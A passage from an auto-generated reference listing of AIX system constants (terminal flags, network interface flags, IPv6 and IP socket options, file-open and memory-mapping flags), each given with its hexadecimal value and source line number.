IBSHIFT = 0x10 constant ICANON (line 166) | ICANON = 0x2 constant ICMP6_FILTER (line 167) | ICMP6_FILTER = 0x26 constant ICMP6_SEC_SEND_DEL (line 168) | ICMP6_SEC_SEND_DEL = 0x46 constant ICMP6_SEC_SEND_GET (line 169) | ICMP6_SEC_SEND_GET = 0x47 constant ICMP6_SEC_SEND_SET (line 170) | ICMP6_SEC_SEND_SET = 0x44 constant ICMP6_SEC_SEND_SET_CGA_ADDR (line 171) | ICMP6_SEC_SEND_SET_CGA_ADDR = 0x45 constant ICRNL (line 172) | ICRNL = 0x100 constant IEXTEN (line 173) | IEXTEN = 0x200000 constant IFA_FIRSTALIAS (line 174) | IFA_FIRSTALIAS = 0x2000 constant IFA_ROUTE (line 175) | IFA_ROUTE = 0x1 constant IFF_64BIT (line 176) | IFF_64BIT = 0x4000000 constant IFF_ALLCAST (line 177) | IFF_ALLCAST = 0x20000 constant IFF_ALLMULTI (line 178) | IFF_ALLMULTI = 0x200 constant IFF_BPF (line 179) | IFF_BPF = 0x8000000 constant IFF_BRIDGE (line 180) | IFF_BRIDGE = 0x40000 constant IFF_BROADCAST (line 181) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 182) | IFF_CANTCHANGE = 0x80c52 constant IFF_CHECKSUM_OFFLOAD (line 183) | IFF_CHECKSUM_OFFLOAD = 0x10000000 constant IFF_D1 (line 184) | IFF_D1 = 0x8000 constant IFF_D2 (line 185) | IFF_D2 = 0x4000 constant IFF_D3 (line 186) | IFF_D3 = 0x2000 constant IFF_D4 (line 187) | IFF_D4 = 0x1000 constant IFF_DEBUG (line 188) | IFF_DEBUG = 0x4 constant IFF_DEVHEALTH (line 189) | IFF_DEVHEALTH = 0x4000 constant IFF_DO_HW_LOOPBACK (line 190) | IFF_DO_HW_LOOPBACK = 0x10000 constant IFF_GROUP_ROUTING (line 191) | IFF_GROUP_ROUTING = 0x2000000 constant IFF_IFBUFMGT (line 192) | IFF_IFBUFMGT = 0x800000 constant IFF_LINK0 (line 193) | IFF_LINK0 = 0x100000 constant IFF_LINK1 (line 194) | IFF_LINK1 = 0x200000 constant IFF_LINK2 (line 195) | IFF_LINK2 = 0x400000 constant IFF_LOOPBACK (line 196) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 197) | IFF_MULTICAST = 0x80000 constant IFF_NOARP (line 198) | IFF_NOARP = 0x80 constant IFF_NOECHO (line 199) | IFF_NOECHO = 0x800 constant IFF_NOTRAILERS (line 200) | IFF_NOTRAILERS = 0x20 constant IFF_OACTIVE (line 201) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 202) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 203) | IFF_PROMISC = 0x100 constant IFF_PSEG (line 204) | IFF_PSEG = 0x40000000 constant IFF_RUNNING (line 205) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 206) | IFF_SIMPLEX = 0x800 constant IFF_SNAP (line 207) | IFF_SNAP = 0x8000 constant IFF_TCP_DISABLE_CKSUM (line 208) | IFF_TCP_DISABLE_CKSUM = 0x20000000 constant IFF_TCP_NOCKSUM (line 209) | IFF_TCP_NOCKSUM = 0x1000000 constant IFF_UP (line 210) | IFF_UP = 0x1 constant IFF_VIPA (line 211) | IFF_VIPA = 0x80000000 constant IFNAMSIZ (line 212) | IFNAMSIZ = 0x10 constant IFO_FLUSH (line 213) | IFO_FLUSH = 0x1 constant IFT_1822 (line 214) | IFT_1822 = 0x2 constant IFT_AAL5 (line 215) | IFT_AAL5 = 0x31 constant IFT_ARCNET (line 216) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 217) | IFT_ARCNETPLUS = 0x24 constant IFT_ATM (line 218) | IFT_ATM = 0x25 constant IFT_CEPT (line 219) | IFT_CEPT = 0x13 constant IFT_CLUSTER (line 220) | IFT_CLUSTER = 0x3e constant IFT_DS3 (line 221) | IFT_DS3 = 0x1e constant IFT_EON (line 222) | IFT_EON = 0x19 constant IFT_ETHER (line 223) | IFT_ETHER = 0x6 constant IFT_FCS (line 224) | IFT_FCS = 0x3a constant IFT_FDDI (line 225) | IFT_FDDI = 0xf constant IFT_FRELAY (line 226) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 227) | IFT_FRELAYDCE = 0x2c constant IFT_GIFTUNNEL (line 228) | IFT_GIFTUNNEL = 0x3c constant IFT_HDH1822 (line 229) | IFT_HDH1822 = 0x3 constant IFT_HF (line 230) | IFT_HF = 0x3d constant IFT_HIPPI (line 231) | IFT_HIPPI = 0x2f constant IFT_HSSI (line 232) | IFT_HSSI = 0x2e constant IFT_HY (line 233) | IFT_HY = 0xe constant IFT_IB (line 234) | IFT_IB = 0xc7 constant IFT_ISDNBASIC (line 235) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 236) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISO88022LLC (line 237) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 238) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 239) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 240) | IFT_ISO88025 = 0x9 constant IFT_ISO88026 (line 241) | IFT_ISO88026 = 0xa constant IFT_LAPB (line 242) | IFT_LAPB = 0x10 constant IFT_LOCALTALK (line 243) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 244) | IFT_LOOP = 0x18 constant IFT_MIOX25 (line 245) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 246) | IFT_MODEM = 0x30 constant IFT_NSIP (line 247) | IFT_NSIP = 0x1b constant IFT_OTHER (line 248) | IFT_OTHER = 0x1 constant IFT_P10 (line 249) | IFT_P10 = 0xc constant IFT_P80 (line 250) | IFT_P80 = 0xd constant IFT_PARA (line 251) | IFT_PARA = 0x22 constant IFT_PPP (line 252) | IFT_PPP = 0x17 constant IFT_PROPMUX (line 253) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 254) | IFT_PROPVIRTUAL = 0x35 constant IFT_PTPSERIAL (line 255) | IFT_PTPSERIAL = 0x16 constant IFT_RS232 (line 256) | IFT_RS232 = 0x21 constant IFT_SDLC (line 257) | IFT_SDLC = 0x11 constant IFT_SIP (line 258) | IFT_SIP = 0x1f constant IFT_SLIP (line 259) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 260) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 261) | IFT_SMDSICIP = 0x34 constant IFT_SN (line 262) | IFT_SN = 0x38 constant IFT_SONET (line 263) | IFT_SONET = 0x27 constant IFT_SONETPATH (line 264) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 265) | IFT_SONETVT = 0x33 constant IFT_SP (line 266) | IFT_SP = 0x39 constant IFT_STARLAN (line 267) | IFT_STARLAN = 0xb constant IFT_T1 (line 268) | IFT_T1 = 0x12 constant IFT_TUNNEL (line 269) | IFT_TUNNEL = 0x3b constant IFT_ULTRA (line 270) | IFT_ULTRA = 0x1d constant IFT_V35 (line 271) | IFT_V35 = 0x2d constant IFT_VIPA (line 272) | IFT_VIPA = 0x37 constant IFT_X25 (line 273) | IFT_X25 = 0x5 constant IFT_X25DDN (line 274) | IFT_X25DDN = 0x4 constant IFT_X25PLE (line 275) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 276) | IFT_XETHER = 0x1a constant IGNBRK (line 277) | IGNBRK = 0x1 constant IGNCR (line 278) | IGNCR = 0x80 constant IGNPAR (line 279) | IGNPAR = 0x4 constant IMAXBEL (line 280) | IMAXBEL = 0x10000 constant INLCR (line 281) | INLCR = 0x40 constant INPCK (line 282) | INPCK = 0x10 constant IN_CLASSA_HOST (line 283) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 284) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 285) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 286) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 287) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 288) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 289) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 290) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 291) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 292) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 293) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 294) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 295) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 296) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 297) | IN_LOOPBACKNET = 0x7f constant IN_USE (line 298) | IN_USE = 0x1 constant IPPROTO_AH (line 299) | IPPROTO_AH = 0x33 constant IPPROTO_BIP (line 300) | IPPROTO_BIP = 0x53 constant IPPROTO_DSTOPTS (line 301) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 302) | IPPROTO_EGP = 0x8 constant IPPROTO_EON (line 303) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 304) | IPPROTO_ESP = 0x32 constant IPPROTO_FRAGMENT (line 305) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 306) | IPPROTO_GGP = 0x3 constant IPPROTO_GIF (line 307) | IPPROTO_GIF = 0x8c constant IPPROTO_GRE (line 308) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 309) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 310) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 311) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 312) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 313) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 314) | IPPROTO_IP = 0x0 constant IPPROTO_IPIP (line 315) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV6 (line 316) | IPPROTO_IPV6 = 0x29 constant IPPROTO_LOCAL (line 317) | IPPROTO_LOCAL = 0x3f constant IPPROTO_MAX (line 318) | IPPROTO_MAX = 0x100 constant IPPROTO_MH (line 319) | IPPROTO_MH = 0x87 constant IPPROTO_NONE (line 320) | IPPROTO_NONE = 0x3b constant IPPROTO_PUP (line 321) | IPPROTO_PUP = 0xc constant IPPROTO_QOS (line 322) | IPPROTO_QOS = 0x2d constant IPPROTO_RAW (line 323) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 324) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 325) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 326) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 327) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 328) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 329) | IPPROTO_UDP = 0x11 constant IPV6_ADDRFORM (line 330) | IPV6_ADDRFORM = 0x16 constant IPV6_ADDR_PREFERENCES (line 331) | IPV6_ADDR_PREFERENCES = 0x4a constant IPV6_ADD_MEMBERSHIP (line 332) | IPV6_ADD_MEMBERSHIP = 0xc constant IPV6_AIXRAWSOCKET (line 333) | IPV6_AIXRAWSOCKET = 0x39 constant IPV6_CHECKSUM (line 334) | IPV6_CHECKSUM = 0x27 constant IPV6_DONTFRAG (line 335) | IPV6_DONTFRAG = 0x2d constant IPV6_DROP_MEMBERSHIP (line 336) | IPV6_DROP_MEMBERSHIP = 0xd constant IPV6_DSTOPTS (line 337) | IPV6_DSTOPTS = 0x36 constant IPV6_FLOWINFO_FLOWLABEL (line 338) | IPV6_FLOWINFO_FLOWLABEL = 0xffffff constant IPV6_FLOWINFO_PRIFLOW (line 339) | IPV6_FLOWINFO_PRIFLOW = 0xfffffff constant IPV6_FLOWINFO_PRIORITY (line 340) | IPV6_FLOWINFO_PRIORITY = 0xf000000 constant IPV6_FLOWINFO_SRFLAG (line 341) | IPV6_FLOWINFO_SRFLAG = 0x10000000 constant IPV6_FLOWINFO_VERSION (line 342) | IPV6_FLOWINFO_VERSION = 0xf0000000 constant IPV6_HOPLIMIT (line 343) | IPV6_HOPLIMIT = 0x28 constant IPV6_HOPOPTS (line 344) | IPV6_HOPOPTS = 0x34 constant IPV6_JOIN_GROUP (line 345) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 346) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MIPDSTOPTS (line 347) | IPV6_MIPDSTOPTS = 0x36 constant IPV6_MULTICAST_HOPS (line 348) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 349) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 350) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 351) | IPV6_NEXTHOP = 0x30 constant IPV6_NOPROBE (line 352) | IPV6_NOPROBE = 0x1c constant IPV6_PATHMTU (line 353) | IPV6_PATHMTU = 0x2e constant IPV6_PKTINFO (line 354) | IPV6_PKTINFO = 0x21 constant IPV6_PKTOPTIONS (line 355) | IPV6_PKTOPTIONS = 0x24 constant IPV6_PRIORITY_10 (line 356) | IPV6_PRIORITY_10 = 0xa000000 constant IPV6_PRIORITY_11 (line 357) | IPV6_PRIORITY_11 = 0xb000000 constant IPV6_PRIORITY_12 (line 358) | IPV6_PRIORITY_12 = 0xc000000 constant IPV6_PRIORITY_13 (line 359) | IPV6_PRIORITY_13 = 0xd000000 constant IPV6_PRIORITY_14 (line 360) | IPV6_PRIORITY_14 = 0xe000000 constant IPV6_PRIORITY_15 (line 361) | IPV6_PRIORITY_15 = 0xf000000 constant IPV6_PRIORITY_8 (line 362) | IPV6_PRIORITY_8 = 0x8000000 constant IPV6_PRIORITY_9 (line 363) | IPV6_PRIORITY_9 = 0x9000000 constant IPV6_PRIORITY_BULK (line 364) | IPV6_PRIORITY_BULK = 0x4000000 constant IPV6_PRIORITY_CONTROL (line 365) | IPV6_PRIORITY_CONTROL = 0x7000000 constant IPV6_PRIORITY_FILLER (line 366) | IPV6_PRIORITY_FILLER = 0x1000000 constant IPV6_PRIORITY_INTERACTIVE (line 367) | IPV6_PRIORITY_INTERACTIVE = 0x6000000 constant IPV6_PRIORITY_RESERVED1 (line 368) | IPV6_PRIORITY_RESERVED1 = 0x3000000 constant IPV6_PRIORITY_RESERVED2 (line 369) | IPV6_PRIORITY_RESERVED2 = 0x5000000 constant IPV6_PRIORITY_UNATTENDED (line 370) | IPV6_PRIORITY_UNATTENDED = 0x2000000 constant IPV6_PRIORITY_UNCHARACTERIZED (line 371) | IPV6_PRIORITY_UNCHARACTERIZED = 0x0 constant IPV6_RECVDSTOPTS (line 372) | IPV6_RECVDSTOPTS = 0x38 constant IPV6_RECVHOPLIMIT (line 373) | IPV6_RECVHOPLIMIT = 0x29 constant IPV6_RECVHOPOPTS (line 374) | IPV6_RECVHOPOPTS = 0x35 constant IPV6_RECVHOPS (line 375) | IPV6_RECVHOPS = 0x22 constant IPV6_RECVIF (line 376) | IPV6_RECVIF = 0x1e constant IPV6_RECVPATHMTU (line 377) | IPV6_RECVPATHMTU = 0x2f constant IPV6_RECVPKTINFO (line 378) | IPV6_RECVPKTINFO = 0x23 constant IPV6_RECVRTHDR (line 379) | IPV6_RECVRTHDR = 0x33 constant IPV6_RECVSRCRT (line 380) | IPV6_RECVSRCRT = 0x1d constant IPV6_RECVTCLASS (line 381) | IPV6_RECVTCLASS = 0x2a constant IPV6_RTHDR (line 382) | IPV6_RTHDR = 0x32 constant IPV6_RTHDRDSTOPTS (line 383) | IPV6_RTHDRDSTOPTS = 0x37 constant IPV6_RTHDR_TYPE_0 (line 384) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_RTHDR_TYPE_2 (line 385) | IPV6_RTHDR_TYPE_2 = 0x2 constant IPV6_SENDIF (line 386) | IPV6_SENDIF = 0x1f constant IPV6_SRFLAG_LOOSE (line 387) | IPV6_SRFLAG_LOOSE = 0x0 constant IPV6_SRFLAG_STRICT (line 388) | IPV6_SRFLAG_STRICT = 0x10000000 constant IPV6_TCLASS (line 389) | IPV6_TCLASS = 0x2b constant IPV6_TOKEN_LENGTH (line 390) | IPV6_TOKEN_LENGTH = 0x40 constant IPV6_UNICAST_HOPS (line 391) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 392) | IPV6_USE_MIN_MTU = 0x2c constant IPV6_V6ONLY (line 393) | IPV6_V6ONLY = 0x25 constant IPV6_VERSION (line 394) | IPV6_VERSION = 0x60000000 constant IP_ADDRFORM (line 395) | IP_ADDRFORM = 0x16 constant IP_ADD_MEMBERSHIP (line 396) | IP_ADD_MEMBERSHIP = 0xc constant IP_ADD_SOURCE_MEMBERSHIP (line 397) | IP_ADD_SOURCE_MEMBERSHIP = 0x3c constant IP_BLOCK_SOURCE (line 398) | IP_BLOCK_SOURCE = 0x3a constant IP_BROADCAST_IF (line 399) | IP_BROADCAST_IF = 0x10 constant IP_CACHE_LINE_SIZE (line 400) | IP_CACHE_LINE_SIZE = 0x80 constant IP_DEFAULT_MULTICAST_LOOP (line 401) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 402) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 403) | IP_DF = 0x4000 constant IP_DHCPMODE (line 404) | IP_DHCPMODE = 0x11 constant IP_DONTFRAG (line 405) | IP_DONTFRAG = 0x19 constant IP_DROP_MEMBERSHIP (line 406) | IP_DROP_MEMBERSHIP = 0xd constant IP_DROP_SOURCE_MEMBERSHIP (line 407) | IP_DROP_SOURCE_MEMBERSHIP = 0x3d constant IP_FINDPMTU (line 408) | IP_FINDPMTU = 0x1a constant IP_HDRINCL (line 409) | IP_HDRINCL = 0x2 constant IP_INC_MEMBERSHIPS (line 410) | IP_INC_MEMBERSHIPS = 0x14 constant IP_INIT_MEMBERSHIP (line 411) | IP_INIT_MEMBERSHIP = 0x14 constant IP_MAXPACKET (line 412) | IP_MAXPACKET = 0xffff constant IP_MF (line 413) | IP_MF = 0x2000 constant IP_MSS (line 414) | IP_MSS = 0x240 constant IP_MULTICAST_HOPS (line 415) | IP_MULTICAST_HOPS = 0xa constant IP_MULTICAST_IF (line 416) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 417) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 418) | IP_MULTICAST_TTL = 0xa constant IP_OPT (line 419) | IP_OPT = 0x1b constant IP_OPTIONS (line 420) | IP_OPTIONS = 0x1 constant IP_PMTUAGE (line 421) | IP_PMTUAGE = 0x1b constant IP_RECVDSTADDR (line 422) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 423) | IP_RECVIF = 0x14 constant IP_RECVIFINFO (line 424) | IP_RECVIFINFO = 0xf constant IP_RECVINTERFACE (line 425) | IP_RECVINTERFACE = 0x20 constant IP_RECVMACHDR (line 426) | IP_RECVMACHDR = 0xe constant IP_RECVOPTS (line 427) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 428) | IP_RECVRETOPTS = 0x6 constant IP_RECVTTL (line 429) | IP_RECVTTL = 0x22 constant IP_RETOPTS (line 430) | IP_RETOPTS = 0x8 constant IP_SOURCE_FILTER (line 431) | IP_SOURCE_FILTER = 0x48 constant IP_TOS (line 432) | IP_TOS = 0x3 constant IP_TTL (line 433) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 434) | IP_UNBLOCK_SOURCE = 0x3b constant IP_UNICAST_HOPS (line 435) | IP_UNICAST_HOPS = 0x4 constant ISIG (line 436) | ISIG = 0x1 constant ISTRIP (line 437) | ISTRIP = 0x20 constant IUCLC (line 438) | IUCLC = 0x800 constant IXANY (line 439) | IXANY = 0x1000 constant IXOFF (line 440) | IXOFF = 0x400 constant IXON (line 441) | IXON = 0x200 constant I_FLUSH (line 442) | I_FLUSH = 0x20005305 constant LNOFLSH (line 443) | LNOFLSH = 0x8000 constant LOCK_EX (line 444) | LOCK_EX = 0x2 constant LOCK_NB (line 445) | LOCK_NB = 0x4 constant LOCK_SH (line 446) | LOCK_SH = 0x1 constant LOCK_UN (line 447) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 448) | MADV_DONTNEED = 0x4 constant MADV_NORMAL (line 449) | MADV_NORMAL = 0x0 constant MADV_RANDOM (line 450) | MADV_RANDOM = 0x1 constant MADV_SEQUENTIAL (line 451) | MADV_SEQUENTIAL = 0x2 constant MADV_SPACEAVAIL (line 452) | MADV_SPACEAVAIL = 0x5 constant MADV_WILLNEED (line 453) | MADV_WILLNEED = 0x3 constant MAP_ANON (line 454) | MAP_ANON = 0x10 constant MAP_ANONYMOUS (line 455) | MAP_ANONYMOUS = 0x10 constant MAP_FILE (line 456) | MAP_FILE = 0x0 constant MAP_FIXED (line 457) | MAP_FIXED = 0x100 constant MAP_PRIVATE (line 458) | MAP_PRIVATE = 0x2 constant MAP_SHARED (line 459) | MAP_SHARED = 0x1 constant MAP_TYPE (line 460) | MAP_TYPE = 0xf0 constant MAP_VARIABLE (line 461) | MAP_VARIABLE = 0x0 constant MCAST_BLOCK_SOURCE (line 462) | MCAST_BLOCK_SOURCE = 0x40 constant MCAST_EXCLUDE (line 463) | MCAST_EXCLUDE = 0x2 constant MCAST_INCLUDE (line 464) | MCAST_INCLUDE = 0x1 constant MCAST_JOIN_GROUP (line 465) | MCAST_JOIN_GROUP = 0x3e constant MCAST_JOIN_SOURCE_GROUP (line 466) | MCAST_JOIN_SOURCE_GROUP = 0x42 constant MCAST_LEAVE_GROUP (line 467) | MCAST_LEAVE_GROUP = 0x3f constant MCAST_LEAVE_SOURCE_GROUP (line 468) | MCAST_LEAVE_SOURCE_GROUP = 0x43 constant MCAST_SOURCE_FILTER (line 469) | MCAST_SOURCE_FILTER = 0x49 constant MCAST_UNBLOCK_SOURCE (line 470) | MCAST_UNBLOCK_SOURCE = 0x41 constant MCL_CURRENT (line 471) | MCL_CURRENT = 0x100 constant MCL_FUTURE (line 472) | MCL_FUTURE = 0x200 constant MSG_ANY (line 473) | MSG_ANY = 0x4 constant MSG_ARGEXT (line 474) | MSG_ARGEXT = 0x400 constant MSG_BAND (line 475) | MSG_BAND = 0x2 constant MSG_COMPAT (line 476) | MSG_COMPAT = 0x8000 constant MSG_CTRUNC (line 477) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 478) | MSG_DONTROUTE = 0x4 constant MSG_EOR (line 479) | MSG_EOR = 0x8 constant MSG_HIPRI (line 480) | MSG_HIPRI = 0x1 constant MSG_MAXIOVLEN (line 481) | MSG_MAXIOVLEN = 0x10 constant MSG_MPEG2 (line 482) | MSG_MPEG2 = 0x80 constant MSG_NONBLOCK (line 483) | MSG_NONBLOCK = 0x4000 constant MSG_NOSIGNAL (line 484) | MSG_NOSIGNAL = 0x100 constant MSG_OOB (line 485) | MSG_OOB = 0x1 constant MSG_PEEK (line 486) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 487) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 488) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 489) | MSG_WAITFORONE = 0x200 constant MS_ASYNC (line 490) | MS_ASYNC = 0x10 constant MS_EINTR (line 491) | MS_EINTR = 0x80 constant MS_INVALIDATE (line 492) | MS_INVALIDATE = 0x40 constant MS_PER_SEC (line 493) | MS_PER_SEC = 0x3e8 constant MS_SYNC (line 494) | MS_SYNC = 0x20 constant NFDBITS (line 495) | NFDBITS = 0x40 constant NL0 (line 496) | NL0 = 0x0 constant NL1 (line 497) | NL1 = 0x4000 constant NL2 (line 498) | NL2 = 0x8000 constant NL3 (line 499) | NL3 = 0xc000 constant NLDLY (line 500) | NLDLY = 0x4000 constant NOFLSH (line 501) | NOFLSH = 0x80 constant NOFLUSH (line 502) | NOFLUSH = 0x80000000 constant OCRNL (line 503) | OCRNL = 0x8 constant OFDEL (line 504) | OFDEL = 0x80 constant OFILL (line 505) | OFILL = 0x40 constant OLCUC (line 506) | OLCUC = 0x2 constant ONLCR (line 507) | ONLCR = 0x4 constant ONLRET (line 508) | ONLRET = 0x20 constant ONOCR (line 509) | ONOCR = 0x10 constant ONOEOT (line 510) | ONOEOT = 0x80000 constant OPOST (line 511) | OPOST = 0x1 constant OXTABS (line 512) | OXTABS = 0x40000 constant O_ACCMODE (line 513) | O_ACCMODE = 0x23 constant O_APPEND (line 514) | O_APPEND = 0x8 constant O_CIO (line 515) | O_CIO = 0x80 constant O_CIOR (line 516) | O_CIOR = 0x800000000 constant O_CLOEXEC (line 517) | O_CLOEXEC = 0x800000 constant O_CREAT (line 518) | O_CREAT = 0x100 constant O_DEFER (line 519) | O_DEFER = 0x2000 constant O_DELAY (line 520) | O_DELAY = 0x4000 constant O_DIRECT (line 521) | O_DIRECT = 0x8000000 constant O_DIRECTORY (line 522) | O_DIRECTORY = 0x80000 constant O_DSYNC (line 523) | O_DSYNC = 0x400000 constant O_EFSOFF (line 524) | O_EFSOFF = 0x400000000 constant O_EFSON (line 525) | O_EFSON = 0x200000000 constant O_EXCL (line 526) | O_EXCL = 0x400 constant O_EXEC (line 527) | O_EXEC = 0x20 constant O_LARGEFILE (line 528) | O_LARGEFILE = 0x4000000 constant O_NDELAY (line 529) | O_NDELAY = 0x8000 constant O_NOCACHE (line 530) | O_NOCACHE = 0x100000 constant O_NOCTTY (line 531) | O_NOCTTY = 0x800 constant O_NOFOLLOW (line 532) | O_NOFOLLOW = 0x1000000 constant O_NONBLOCK (line 533) | O_NONBLOCK = 0x4 constant O_NONE (line 534) | O_NONE = 0x3 constant O_NSHARE (line 535) | O_NSHARE = 0x10000 constant O_RAW (line 536) | O_RAW = 0x100000000 constant O_RDONLY (line 537) | O_RDONLY = 0x0 constant O_RDWR (line 538) | O_RDWR = 0x2 constant O_RSHARE (line 539) | O_RSHARE = 0x1000 constant O_RSYNC (line 540) | O_RSYNC = 0x200000 constant O_SEARCH (line 541) | O_SEARCH = 0x20 constant O_SNAPSHOT (line 542) | O_SNAPSHOT = 0x40 constant O_SYNC (line 543) | O_SYNC = 0x10 constant O_TRUNC (line 544) | O_TRUNC = 0x200 constant O_TTY_INIT (line 545) | O_TTY_INIT = 0x0 constant O_WRONLY (line 546) | O_WRONLY = 0x1 constant PARENB (line 547) | PARENB = 0x100 constant PAREXT (line 548) | PAREXT = 0x100000 constant PARMRK (line 549) | PARMRK = 0x8 constant PARODD (line 550) | PARODD = 0x200 constant PENDIN (line 551) | PENDIN = 0x20000000 constant PRIO_PGRP (line 552) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 553) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 554) | PRIO_USER = 0x2 constant PROT_EXEC (line 555) | PROT_EXEC = 0x4 constant PROT_NONE (line 556) | PROT_NONE = 0x0 constant PROT_READ (line 557) | PROT_READ = 0x1 constant PROT_WRITE (line 558) | PROT_WRITE = 0x2 constant PR_64BIT (line 559) | PR_64BIT = 0x20 constant PR_ADDR (line 560) | PR_ADDR = 0x2 constant PR_ARGEXT (line 561) | PR_ARGEXT = 0x400 constant PR_ATOMIC (line 562) | PR_ATOMIC = 0x1 constant PR_CONNREQUIRED (line 563) | PR_CONNREQUIRED = 0x4 constant PR_FASTHZ (line 564) | PR_FASTHZ = 0x5 constant PR_INP (line 565) | PR_INP = 0x40 constant PR_INTRLEVEL (line 566) | PR_INTRLEVEL = 0x8000 constant PR_MLS (line 567) | PR_MLS = 0x100 constant PR_MLS_1_LABEL (line 568) | PR_MLS_1_LABEL = 0x200 constant PR_NOEOR (line 569) | PR_NOEOR = 0x4000 constant PR_RIGHTS (line 570) | PR_RIGHTS = 0x10 constant PR_SLOWHZ (line 571) | PR_SLOWHZ = 0x2 constant PR_WANTRCVD (line 572) | PR_WANTRCVD = 0x8 constant RLIMIT_AS (line 573) | RLIMIT_AS = 0x6 constant RLIMIT_CORE (line 574) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 575) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 576) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 577) | RLIMIT_FSIZE = 0x1 constant RLIMIT_NOFILE (line 578) | RLIMIT_NOFILE = 0x7 constant RLIMIT_NPROC (line 579) | RLIMIT_NPROC = 0x9 constant RLIMIT_RSS (line 580) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 581) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 582) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 583) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 584) | RTAX_BRD = 0x7 constant RTAX_DST (line 585) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 586) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 587) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 588) | RTAX_IFA = 0x5 constant RTAX_IFP (line 589) | RTAX_IFP = 0x4 constant RTAX_MAX (line 590) | RTAX_MAX = 0x8 constant RTAX_NETMASK (line 591) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 592) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 593) | RTA_BRD = 0x80 constant RTA_DOWNSTREAM (line 594) | RTA_DOWNSTREAM = 0x100 constant RTA_DST (line 595) | RTA_DST = 0x1 constant RTA_GATEWAY (line 596) | RTA_GATEWAY = 0x2 constant 